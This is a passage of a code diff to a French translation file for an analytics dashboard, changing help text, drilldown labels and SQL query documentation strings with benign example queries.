haut du tracé. En cas d’appel sur plusieurs listes de séries, le dernier appel est utilisé.", - "timelion.help.functions.trend.args.endHelpText": "Quand arrêter de calculer par rapport au début ou à la fin. Par exemple, -10 indique qu'il faut arrêter de calculer 10 points avant la fin, et +15 indique que le calcul doit s'arrêter 15 points après le début. Par défaut : 0", - "timelion.help.functions.trend.args.modeHelpText": "L'algorithme à utiliser pour générer la courbe de tendance. L'une des options suivantes : {validRegressions}.", - "timelion.help.functions.trend.args.startHelpText": "Quand commencer à calculer par rapport au début ou à la fin. Par exemple, -10 indique qu'il faut commencer à calculer 10 points avant la fin, et +15 indique que le calcul doit commencer 15 points après le début. Par défaut : 0", + "timelion.help.functions.trend.args.endHelpText": "Quand arrêter de calculer par rapport au début ou à la fin. Par exemple, -10 indique qu'il faut arrêter de calculer 10 points avant la fin, et +15 indique que le calcul doit s'arrêter 15 points après le début. Par défaut : 0", + "timelion.help.functions.trend.args.startHelpText": "Quand commencer à calculer par rapport au début ou à la fin. Par exemple, -10 indique qu'il faut commencer à calculer 10 points avant la fin, et +15 indique que le calcul doit commencer 15 points après le début. Par défaut : 0", "timelion.help.functions.trendHelpText": "Dessine une courbe de tendance à l'aide d'un algorithme de régression spécifié.", - "timelion.help.functions.trim.args.endHelpText": "Compartiments à retirer de la fin de la série. Par défaut : 1", - "timelion.help.functions.trim.args.startHelpText": "Compartiments à retirer du début de la série. Par défaut : 1", - "timelion.help.functions.trimHelpText": "Définir N compartiments au début ou à la fin de la série sur null pour ajuster le \"problème de compartiment partiel\"", - "timelion.help.functions.worldbank.args.codeHelpText": "Chemin de l'API Worldbank (Banque mondiale). Il s'agit généralement de tout ce qui suit le domaine, avant la chaîne de requête. Par exemple : {apiPathExample}.", - "timelion.help.functions.worldbankHelpText": "\n [expérimental]\n Extrayez des données de {worldbankUrl} à l'aide du chemin d’accès aux séries.\n La Banque mondiale fournit surtout des données annuelles et n'a souvent aucune donnée pour l'année en cours.\n Essayez {offsetQuery} si vous n’obtenez pas de données pour les plages temporelles récentes.", - "timelion.help.functions.worldbankIndicators.args.countryHelpText": "Identifiant de pays de la Banque mondiale. Généralement le code à 2 caractères du pays.", - "timelion.help.functions.worldbankIndicators.args.indicatorHelpText": "Le code d'indicateur à utiliser. Vous devrez le rechercher sur {worldbankUrl}. Souvent très complexe. Par exemple, {indicatorExample} correspond à la population.", - "timelion.help.functions.worldbankIndicatorsHelpText": "\n [expérimental]\n Extrayez des données de {worldbankUrl} à l'aide du nom et de l'indicateur du pays. La Banque mondiale fournit\n surtout des données annuelles et n'a souvent aucune donnée pour l'année en cours. Essayez {offsetQuery} si vous n’obtenez pas de données pour\n les plages temporelles récentes.", + "timelion.help.functions.trim.args.endHelpText": "Compartiments à retirer de la fin de la série. Par défaut : 1", + "timelion.help.functions.trim.args.startHelpText": "Compartiments à retirer du début de la série. Par défaut : 1", + "timelion.help.functions.trimHelpText": "Définir N compartiments au début ou à la fin de la série sur null pour ajuster le \"problème de compartiment partiel\"", + "timelion.help.functions.worldbankIndicators.args.countryHelpText": "Identifiant de pays de la Banque mondiale. Généralement le code à 2 caractères du pays.", "timelion.help.functions.yaxis.args.colorHelpText": "Couleur de l'étiquette de l'axe", "timelion.help.functions.yaxis.args.labelHelpText": "Étiquette de l'axe", "timelion.help.functions.yaxis.args.maxHelpText": "Valeur max.", "timelion.help.functions.yaxis.args.minHelpText": "Valeur min.", "timelion.help.functions.yaxis.args.positionHelpText": "gauche ou droite", - "timelion.help.functions.yaxis.args.tickDecimalsHelpText": "Le nombre de décimales pour les étiquettes de graduation de l'axe Y.", - "timelion.help.functions.yaxis.args.unitsHelpText": "La fonction à utiliser pour mettre en forme les étiquettes de l'axe Y. L'une des options suivantes : {formatters}.", - "timelion.help.functions.yaxis.args.yaxisHelpText": "L'axe Y numéroté sur lequel tracer cette série, par exemple .yaxis(2) pour un deuxième axe Y.", - "timelion.help.functions.yaxisHelpText": "Configure une variété d'options pour l'axe Y, la plus importante étant sans doute celle permettant d'ajouter un énième (par ex. deuxième) axe Y.", - "timelion.noFunctionErrorMessage": "Fonction inconnue : {name}", + "timelion.help.functions.yaxis.args.tickDecimalsHelpText": "Le nombre de décimales pour les étiquettes de graduation de l'axe Y.", + "timelion.help.functions.yaxis.args.yaxisHelpText": "L'axe Y numéroté sur lequel tracer cette série, par exemple .yaxis(2) pour un deuxième axe Y.", + "timelion.help.functions.yaxisHelpText": "Configure une variété d'options pour l'axe Y, la plus importante étant sans doute celle permettant d'ajouter un énième (par ex. deuxième) axe Y.", "timelion.panels.timechart.unknownIntervalErrorMessage": "Intervalle inconnu", "timelion.requestHandlerErrorTitle": "Erreur de requête Timelion", - "timelion.serverSideErrors.argumentsOverflowErrorMessage": "Trop d'arguments transmis à : {functionName}", - "timelion.serverSideErrors.bucketsOverflowErrorMessage": "Nombre max. de compartiments dépassé : {bucketCount} sur {maxBuckets} autorisés. Sélectionnez un intervalle plus grand ou une période plus courte.", "timelion.serverSideErrors.colorFunction.colorNotProvidedErrorMessage": "couleur non spécifiée", "timelion.serverSideErrors.conditionFunction.unknownOperatorErrorMessage": "Opérateur inconnu", "timelion.serverSideErrors.conditionFunction.wrongArgTypeErrorMessage": "doit être un nombre ou une liste de séries", - "timelion.serverSideErrors.errorInCell": " dans la cellule no {number} : {message}", - "timelion.serverSideErrors.esFunction.indexNotFoundErrorMessage": "Index Elasticsearch introuvable : {index}", - "timelion.serverSideErrors.holtFunction.missingParamsErrorMessage": "Vous devez spécifier une longueur de saison et une taille d'échantillon >= 2.", - "timelion.serverSideErrors.holtFunction.notEnoughPointsErrorMessage": "Au moins 2 points sont nécessaires pour utiliser le lissage exponentiel double.", - "timelion.serverSideErrors.movingaverageFunction.notValidPositionErrorMessage": "Les positions valides sont : {validPositions}.", - "timelion.serverSideErrors.movingstdFunction.notValidPositionErrorMessage": "Les positions valides sont : {validPositions}.", - "timelion.serverSideErrors.pointsFunction.notValidSymbolErrorMessage": "Les symboles valides sont : {validSymbols}.", - "timelion.serverSideErrors.sheetParseErrorMessage": "Attendu : {expectedDescription} au caractère {column}", - "timelion.serverSideErrors.unknownArgumentErrorMessage": "Argument inconnu pour {functionName} : {argumentName}", - "timelion.serverSideErrors.unknownArgumentTypeErrorMessage": "Type d'argument non pris en charge : {argument}", - "timelion.serverSideErrors.worldbankFunction.noDataErrorMessage": "La requête à la Banque mondiale a réussi, mais il n'y a pas de données pour {code}.", - "timelion.serverSideErrors.wrongFunctionArgumentTypeErrorMessage": "{functionName}({argumentName}) doit être l'une des options suivantes : {requiredTypes}. Obtenu : {actualType}", - "timelion.serverSideErrors.yaxisFunction.notSupportedUnitTypeErrorMessage": "{units} n'est pas un type d'unité pris en charge.", + "timelion.serverSideErrors.holtFunction.missingParamsErrorMessage": "Vous devez spécifier une longueur de saison et une taille d'échantillon >= 2.", + "timelion.serverSideErrors.holtFunction.notEnoughPointsErrorMessage": "Au moins 2 points sont nécessaires pour utiliser le lissage exponentiel double.", "timelion.serverSideErrors.yaxisFunction.notValidCurrencyFormatErrorMessage": "La devise doit être un code à trois caractères.", "timelion.timelionDescription": "Affichez des données temporelles sur un graphe.", - "timelion.uiSettings.defaultIndexDescription": "Index Elasticsearch par défaut dans lequel rechercher avec {esParam}", "timelion.uiSettings.defaultIndexLabel": "Index par défaut", "timelion.uiSettings.maximumBucketsDescription": "Le nombre maximal de compartiments qu'une source de données unique peut renvoyer", "timelion.uiSettings.maximumBucketsLabel": "Nombre maximal de compartiments", "timelion.uiSettings.minimumIntervalDescription": "Le plus petit intervalle qui sera calculé lors de l'utilisation de l'option \"auto\"", "timelion.uiSettings.minimumIntervalLabel": "Intervalle minimal", "timelion.uiSettings.targetBucketsDescription": "Le nombre de compartiments visé lors de l'utilisation d'intervalles automatiques", - "timelion.uiSettings.targetBucketsLabel": "Compartiments cibles", - "timelion.uiSettings.timeFieldDescription": "Champ par défaut contenant un horodatage lors de l'utilisation de {esParam}", + "timelion.uiSettings.targetBucketsLabel": "Nombre de compartiments cible", "timelion.uiSettings.timeFieldLabel": "Champ temporel", "timelion.vis.expressionLabel": "Expression Timelion", "timelion.vis.interval.auto": "Auto", - "timelion.vis.interval.day": "1 jour", - "timelion.vis.interval.hour": "1 heure", - "timelion.vis.interval.minute": "1 minute", - "timelion.vis.interval.month": "1 mois", - "timelion.vis.interval.second": "1 seconde", - "timelion.vis.interval.week": "1 semaine", - "timelion.vis.interval.year": "1 an", + "timelion.vis.interval.day": "1 jour", + "timelion.vis.interval.hour": "1 heure", + "timelion.vis.interval.minute": "1 minute", + "timelion.vis.interval.month": "1 mois", + "timelion.vis.interval.second": "1 seconde", + "timelion.vis.interval.week": "1 semaine", + "timelion.vis.interval.year": "1 an", "timelion.vis.intervalLabel": "Intervalle", "timelion.vis.invalidIntervalErrorMessage": "Format d'intervalle non valide.", - "timelion.vis.selectIntervalHelpText": "Choisissez une option ou créez une valeur personnalisée. Exemples : 30s, 20m, 24h, 2d, 1w, 1M", + "timelion.vis.selectIntervalHelpText": "Choisissez une option ou créez une valeur personnalisée. Exemples : 30s, 20m, 24h, 2d, 1w, 1M", "timelion.vis.selectIntervalPlaceholder": "Choisir un intervalle", - "uiActions.actionPanel.more": "Plus", - "uiActions.actionPanel.title": "Options", - "uiActions.errors.incompatibleAction": "Action non compatible", - "uiActions.triggers.rowClickkDescription": "Un clic sur une ligne de tableau", - "uiActions.triggers.rowClickTitle": "Clic sur ligne de tableau", + "uiActionsEnhanced.components.DrilldownTable.deleteDrilldownsButtonLabel": "Supprimer ({count})", + "uiActionsEnhanced.components.DrilldownTemplateTable.copyButtonLabel": "Copier ({count})", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.invalidDrilldownType": "Le type de recherche {type} n'existe pas", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownCreatedTitle": "Recherche \"{drilldownName}\" créée", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownEditedTitle": "Recherche \"{drilldownName}\" mise à jour", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownsDeletedTitle": "{n} recherches supprimées", + "uiActionsEnhanced.drilldowns.containers.drilldownList.copyingNotification.body": "{count, number} {count, plural, one {recherche} other {recherches}} copiée(s).", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlTemplatePlaceholderText": "Exemple : {exampleUrl}", + "uiActionsEnhanced.drilldowns.urlDrilldownValidation.urlFormatErrorMessage": "Format non valide : {message}", + "uiActionsEnhanced.drilldowns.urlDrilldownValidation.urlFormatGeneralErrorMessage": "Format non valide. Exemple : {exampleUrl}", + "uiActionsEnhanced.components.actionWizard.betaActionLabel": "Bêta", + "uiActionsEnhanced.components.actionWizard.betaActionTooltip": "Cette action est en version bêta et susceptible d'être modifiée. La conception et le code sont moins matures que les fonctionnalités officielles en disponibilité générale et sont fournis tels quels sans aucune garantie. Les fonctionnalités bêta ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. Nous vous remercions de bien vouloir nous aider en nous signalant les bugs ou en nous envoyant d'autres commentaires.", + "uiActionsEnhanced.components.actionWizard.changeButton": "Modifier", + "uiActionsEnhanced.components.actionWizard.insufficientLicenseLevelTooltip": "Niveau de licence insuffisant", + "uiActionsEnhanced.components.actionWizard.triggerPickerHelpText": "Qu'est-ce que c'est ?", + "uiActionsEnhanced.components.actionWizard.triggerPickerHelpTooltip": "Détermine quand la recherche s'affiche dans le menu contextuel", + "uiActionsEnhanced.components.actionWizard.triggerPickerLabel": "Afficher l'option sur :", + "uiActionsEnhanced.components.DrilldownForm.betaActionLabel": "Bêta", + "uiActionsEnhanced.components.DrilldownForm.betaActionTooltip": "Cette action est en version bêta et susceptible d'être modifiée. La conception et le code sont moins matures que les fonctionnalités officielles en disponibilité générale et sont fournis tels quels sans aucune garantie. Les fonctionnalités bêta ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. Nous vous remercions de bien vouloir nous aider en nous signalant les bugs ou en nous envoyant d'autres commentaires.", + "uiActionsEnhanced.components.DrilldownForm.changeButton": "Modifier", + "uiActionsEnhanced.components.DrilldownForm.drilldownAction": "Action", + "uiActionsEnhanced.components.DrilldownForm.getMoreActionsLinkLabel": "Obtenir plus d'actions", + "uiActionsEnhanced.components.DrilldownForm.nameOfDrilldown": "Nom", + "uiActionsEnhanced.components.DrilldownForm.trigger": "Déclencher", + "uiActionsEnhanced.components.DrilldownForm.untitledDrilldown": "Recherche sans titre", + "uiActionsEnhanced.components.DrilldownTable.actionColumnTitle": "Action", + "uiActionsEnhanced.components.DrilldownTable.copyDrilldownButtonLabel": "Copier", + "uiActionsEnhanced.components.DrilldownTable.createDrilldownButtonLabel": "Créer", + "uiActionsEnhanced.components.DrilldownTable.editDrilldownButtonLabel": "Modifier", + "uiActionsEnhanced.components.DrilldownTable.nameColumnTitle": "Nom", + "uiActionsEnhanced.components.DrilldownTable.selectThisDrilldownCheckboxLabel": "Sélectionner cette recherche", + "uiActionsEnhanced.components.DrilldownTable.triggerColumnTitle": "Déclencher", + "uiActionsEnhanced.components.DrilldownTemplateTable.actionColumnTitle": "Action", + "uiActionsEnhanced.components.DrilldownTemplateTable.nameColumnTitle": "Nom", + "uiActionsEnhanced.components.DrilldownTemplateTable.selectableMessage": "Sélectionner ce modèle", + "uiActionsEnhanced.components.DrilldownTemplateTable.singleItemCopyAction": "Copier", + "uiActionsEnhanced.components.DrilldownTemplateTable.sourceColumnTitle": "Panneau", + "uiActionsEnhanced.components.DrilldownTemplateTable.triggerColumnTitle": "Déclencher", + "uiActionsEnhanced.components.TriggerLineItem.incompatibleTooltip": "Ce type de déclenchement n'est pas pris en charge par ce panneau", + "uiActionsEnhanced.components.TriggerPickerItem.unknown": "Inconnu", + "uiActionsEnhanced.CustomActions": "Actions personnalisées", + "uiActionsEnhanced.customizePanelTimeRange.modal.addToPanelButtonTitle": "Ajouter au panneau", + "uiActionsEnhanced.customizePanelTimeRange.modal.cancelButtonTitle": "Annuler", + "uiActionsEnhanced.customizePanelTimeRange.modal.optionsMenuForm.panelTitleFormRowLabel": "Plage temporelle", + "uiActionsEnhanced.customizePanelTimeRange.modal.removeButtonTitle": "Retirer", + "uiActionsEnhanced.customizePanelTimeRange.modal.updatePanelTimeRangeButtonTitle": "Mettre à jour", + "uiActionsEnhanced.customizeTimeRange.modal.headerTitle": "Personnaliser la plage temporelle du panneau", + "uiActionsEnhanced.customizeTimeRangeMenuItem.displayName": "Personnaliser la plage temporelle", + "uiActionsEnhanced.drilldownManager.containers.TemplatePicker.label": "Copier la recherche existante", + "uiActionsEnhanced.drilldowns.components.DrilldownHelloBar.helpText": "Les recherches vous permettent de définir de nouveaux comportements pour l'interaction avec les panneaux. Vous pouvez ajouter plusieurs actions et remplacer le filtre par défaut.", + "uiActionsEnhanced.drilldowns.components.DrilldownHelloBar.hideHelpButtonLabel": "Masquer", + "uiActionsEnhanced.drilldowns.components.DrilldownHelloBar.viewDocsLinkLabel": "Afficher les documents", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.createDrilldownTitle": "Créer une recherche", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.deleteDrilldownButtonLabel": "Supprimer une recherche", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.editDrilldownTitle": "Modifier une recherche", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.insufficientLicenseLevelError": "Niveau de licence insuffisant", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownCreatedText": "Enregistrez votre tableau de bord avant de tester.", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownDeletedText": "Enregistrez votre tableau de bord avant de tester.", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownDeletedTitle": "Recherche supprimée", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownEditedText": "Enregistrez votre tableau de bord avant de tester.", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownsCRUDErrorTitle": "Erreur lors de l'enregistrement de la recherche", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownsDeletedText": "Enregistrez votre tableau de bord avant de tester.", + "uiActionsEnhanced.drilldowns.components.FlyoutFrame.BackButtonLabel": "Retour", + "uiActionsEnhanced.drilldowns.components.FlyoutFrame.CloseButtonLabel": "Fermer", + "uiActionsEnhanced.drilldowns.containers.createDrilldownForm.primaryButton": "Créer une recherche", + "uiActionsEnhanced.drilldowns.containers.createDrilldownForm.title": "Créer une recherche", + "uiActionsEnhanced.drilldowns.containers.drilldownList.copyingNotification.dismiss": "Rejeter", + "uiActionsEnhanced.drilldowns.containers.DrilldownManager.createNew": "Créer nouvelle", + "uiActionsEnhanced.drilldowns.containers.DrilldownManager.manage": "Gérer", + "uiActionsEnhanced.drilldowns.containers.editDrilldownForm.primaryButton": "Enregistrer", + "uiActionsEnhanced.drilldowns.containers.editDrilldownForm.title": "Modifier une recherche", + "uiActionsEnhanced.drilldowns.drilldownManager.state.defaultTitle": "Recherches", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.additionalOptions": "Options supplémentaires", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.addVariableButtonTitle": "Ajouter une variable", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.encodeDescription": "Si elle est activée, l'URL sera précédée de l’encodage-pourcent comme caractère d'échappement", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.encodeUrl": "Encoder l'URL", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.openInNewTabLabel": "Ouvrir dans une nouvelle fenêtre", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlPreviewHelpText": "Veuillez noter que dans l'aperçu, les variables \\{\\{event.*\\}\\} sont remplacées par des valeurs factices.", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlPreviewLabel": "Aperçu de l'URL :", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlPreviewLinkText": "Aperçu", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlTemplateLabel": "Entrer l'URL", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlTemplateSyntaxHelpLinkText": "Aide pour la syntaxe", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlTemplateVariablesFilterPlaceholderText": "Variables de filtre", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlTemplateVariablesHelpLinkText": "Aide", + "unifiedSearch.filter.filterBar.filterItemBadgeIconAriaLabel": "Supprimer {filter}", + "unifiedSearch.filter.filterBar.labelErrorInfo": "Modèle d'indexation {indexPattern} introuvable", + "unifiedSearch.filter.filterBar.labelWarningInfo": "Le champ {fieldName} n'existe pas dans la vue en cours.", + "unifiedSearch.kueryAutocomplete.andOperatorDescription": "Nécessite que {bothArguments} soient ''vrai''.", + "unifiedSearch.kueryAutocomplete.equalOperatorDescription": "{equals} une certaine valeur", + "unifiedSearch.kueryAutocomplete.existOperatorDescription": "{exists} sous un certain format", + "unifiedSearch.kueryAutocomplete.greaterThanOperatorDescription": "est {greaterThan} une certaine valeur", + "unifiedSearch.kueryAutocomplete.greaterThanOrEqualOperatorDescription": "est {greaterThanOrEqualTo} une certaine valeur", + "unifiedSearch.kueryAutocomplete.lessThanOperatorDescription": "est {lessThan} une certaine valeur", + "unifiedSearch.kueryAutocomplete.lessThanOrEqualOperatorDescription": "est {lessThanOrEqualTo} une certaine valeur", + "unifiedSearch.kueryAutocomplete.orOperatorDescription": "Nécessite qu’{oneOrMoreArguments} soit ''vrai''.", + "unifiedSearch.query.queryBar.comboboxAriaLabel": "Rechercher et filtrer la page {pageType}", + "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoText": "Il semblerait que votre requête porte sur un champ imbriqué. Selon le résultat visé, il existe plusieurs façons de construire une syntaxe KQL pour des requêtes imbriquées. Apprenez-en plus avec notre {link}.", + "unifiedSearch.query.queryBar.searchInputAriaLabel": "Commencer à taper pour rechercher et filtrer la page {pageType}", + "unifiedSearch.query.queryBar.searchInputPlaceholder": "Filtrer vos données à l'aide de la syntaxe {language}", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.header": "Référence de {language}", + "unifiedSearch.query.textBasedLanguagesEditor.documentationTooltip": "Référence de {lang}", + "unifiedSearch.query.textBasedLanguagesEditor.errorCount": "{count} {count, plural, one {erreur} other {erreurs}}", + "unifiedSearch.query.textBasedLanguagesEditor.lineCount": "{count} {count, plural, one {ligne} other {lignes}}", + "unifiedSearch.query.textBasedLanguagesEditor.lineNumber": "Ligne {lineNumber}", + "unifiedSearch.search.searchBar.savedQueryPopoverConfirmDeletionTitle": "Supprimer \"{savedQueryName}\" ?", + "unifiedSearch.search.searchBar.savedQueryPopoverSaveChangesButtonAriaLabel": "Enregistrer les modifications apportées à {title}", + "unifiedSearch.search.unableToGetSavedQueryToastTitle": "Impossible de charger la requête enregistrée {savedQueryId}", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.addOperator.markdown": "### Add (+)\n```\nSELECT 1 + 1 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.andOperator.markdown": "### AND\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no > 10000 AND emp_no < 10005 ORDER BY emp_no LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.averageFunction.markdown": "### AVG\nRetourne la moyenne (moyenne arithmétique) des valeurs entrées.\n```\nAVG(numeric_field)\n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n```\nSELECT AVG(salary) AS avg FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.between.markdown": "### Between\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no BETWEEN 9990 AND 10003 ORDER BY emp_no\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.comparison.markdown": "### Comparison (<, <=, >, >=)\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no < 10003 ORDER BY emp_no LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countAllFunction.markdown": "### Count (All)\nRenvoie le nombre total de toutes les valeurs non nulles en entrée. COUNT() et COUNT(ALL ) sont équivalents.\n\n```\nCOUNT(ALL field_name) \n```\n- nom du champ. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n```\nSELECT COUNT(ALL last_name) AS count_all, COUNT(DISTINCT last_name) count_distinct FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countDistinctFunction.markdown": "### Count (Distinct)\nRenvoie le nombre total de valeurs non nulles distinctes dans les valeurs en entrée.\n\n```\nCOUNT(DISTINCT field_name)\n```\n- Entrée : un nom de champ.\n- Sortie : une valeur numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n```\nSELECT COUNT(DISTINCT hire_date) unique_hires, COUNT(hire_date) AS hires FROM emp\n\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countFunction.markdown": "### Count\nRenvoie le nombre total de valeurs en entrée.\n\n\n```\nCOUNT(expression)\n```\n- expression. Nom de champ, caractère générique (*) ou n'importe quelle valeur numérique. Pour COUNT(*) ou COUNT(), toutes les valeurs sont prises en compte, même celles manquantes ou nulles. Pour COUNT(), les valeurs nulles ne sont pas prises en compte.\n```\nSELECT COUNT(*) AS count FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.divideOperator.markdown": "### Divide (/)\n```\nSELECT 6 / 3 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.equality.markdown": "### Equality (=)\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no = 10000 LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.firstFunction.markdown": "### FIRST / FIRST_VALUE\nRenvoie la première valeur non nulle (si elle existe) de la colonne d'entrée field_name triée selon la colonne ordering_field_name. Si la valeur ordering_field_name n'est pas fournie, seule la colonne field_name est utilisée pour le tri. \n\n```\nFIRST(\n field_name \n [, ordering_field_name])\n```\n- Nom du champ : champ cible de l'agrégation\n- ordering_field_name : champ facultatif utilisé pour le tri.\n\n```\nSELECT gender, FIRST(first_name, birth_date) FROM emp GROUP BY gender ORDER BY gender\n```\n\n- FIRST ne peut pas être utilisé dans une clause HAVING.\n- FIRST ne peut pas être utilisé avec des colonnes de type texte, sauf si le champ est aussi enregistré comme mot-clé.\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.inequality.markdown": "### Inequality (<> or !=)\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no <> 10000 ORDER BY emp_no LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.inOperator.markdown": "### IN (, , ...)\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no IN (10000, 10001, 10002, 999) ORDER BY emp_no LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.kurtosisFunction.markdown": "### KURTOSIS\nQuantifier la forme de la distribution des valeurs en entrée dans le champ field_name.\n\n```\nKURTOSIS(field_name) \n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, KURTOSIS(salary) AS k FROM emp\n```\n\n- KURTOSIS ne peut pas être utilisé en plus des fonctions ou des opérateurs scalaires, uniquement sur un champ. \n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.lastFunction.markdown": "### LAST / LAST_VALUE\nInverse de FIRST/FIRST_VALUE. Renvoie la dernière valeur non nulle (si elle existe) de la colonne d'entrée field_name triée par ordre croissant selon la colonne ordering_field_name. Si la valeur ordering_field_name n'est pas fournie, seule la colonne field_name est utilisée pour le tri. \n\n```\nLAST(\n field_name \n [, ordering_field_name])\n```\n- Nom du champ : champ cible de l'agrégation\n- ordering_field_name : champ facultatif utilisé pour le tri.\n```\nSELECT gender, LAST(first_name) FROM emp GROUP BY gender ORDER BY gender\n```\n- LAST ne peut pas être utilisé dans une clause HAVING.\n- LAST ne peut pas être utilisé avec des colonnes de type texte, sauf si le champ est aussi enregistré comme mot-clé.\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.madFunction.markdown": "### MAD\nMesure la variabilité des valeurs d'entrée dans le champ field_name.\n\n```\nMAD(field_name) \n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, AVG(salary) AS avg, MAD(salary) AS mad FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.markdown": "## Fonctionnement\n\nAvec Elasticsearch SQL, vous avez accès à cette recherche full text, \nà grande vitesse et avec une scalabilité simple, en utilisant une syntaxe de requête familière.\nVous pouvez utiliser SQL pour rechercher et agréger les données de façon native dans Elasticsearch. \nElasticsearch SQL est un peu un outil de traduction, \nqui comprend à la fois SQL et Elasticsearch, et facilite\nla lecture et le traitement des données en temps réel.\n \nExemple de requête SQL :\n \n```\nSELECT * FROM library \nORDER BY page_count DESC LIMIT 5\n```\n \nEn règle générale, comme l'indique le nom Elasticsearch SQL, il propose une interface SQL à Elasticsearch.\nDe ce fait, il suit la terminologie et les conventions SQL partout où c'est possible.\n \nElasticsearch SQL n'accepte actuellement qu'une seule commande à la fois. Une commande est une séquence de jetons terminée par la fin du flux d'entrée.\n \nElasticsearch SQL fournit un jeu complet d'opérateurs et de fonctions intégrés.\n \n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.maxFunction.markdown": "### MAX\nRetourne la valeur maximale de toutes les valeurs en entrée dans le champ field_name.\n\n```\nMAX(field_name) \n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MAX(salary) AS max FROM emp\n```\n\n- MAX sur un champ de type texte ou mot-clé est traduit en FIRST/FIRST_VALUE et ne peut donc pas être utilisé dans la clause HAVING.\n\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.minFunction.markdown": "### MIN\nRetourne la valeur minimale de toutes les valeurs en entrée dans le champ field_name.\n\n```\nMIN(field_name) \n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min FROM emp\n```\n\n- MIN sur un champ de type texte ou mot-clé est traduit en FIRST/FIRST_VALUE et ne peut donc pas être utilisé dans la clause HAVING.\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.moduloOperator.markdown": "### Modulo or remainder(%)\n```\nSELECT 5 % 2 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.multiplyOperator.markdown": "### Multiply (*)\n```\nSELECT 2 * 3 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.negateOperator.markdown": "### Negate (unary -)\n```\nSELECT - 1 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.notOperator.markdown": "### NOT\n```\nSELECT last_name l FROM \"test_emp\" 